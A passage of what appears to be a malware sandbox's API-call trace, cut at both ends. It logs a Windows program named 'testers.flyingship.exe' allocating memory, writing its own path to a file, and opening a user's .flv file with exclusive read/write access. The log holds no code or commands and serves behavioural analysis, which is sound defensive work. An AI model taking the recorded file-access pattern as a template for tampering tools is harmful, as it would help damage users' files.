lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0167.707] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0167.707] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xb32, lpOverlapped=0x0) returned 1 [0167.707] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0167.707] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xb32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.707] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0167.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\n", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0167.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db138 [0167.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\n", cchWideChar=63, lpMultiByteStr=0x8db138, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\n", lpUsedDefaultChar=0x0) returned 63 [0167.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0167.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.708] WriteFile (in: hFile=0x120, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3e, lpOverlapped=0x0) returned 1 [0167.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.708] CloseHandle (hObject=0x120) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0167.709] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0167.709] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.711] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0167.711] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.711] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.711] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0167.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0167.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0167.712] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0167.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0167.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0167.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0167.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0167.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0167.714] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0167.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0167.715] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0167.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0167.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0167.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0167.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0167.716] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.716] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tteahk_e6.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.718] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.718] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.719] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.719] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0167.719] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.719] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.719] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0167.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", 